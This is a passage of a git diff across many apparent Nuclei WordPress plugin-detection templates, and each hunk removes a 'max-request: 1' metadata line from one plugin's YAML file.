1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 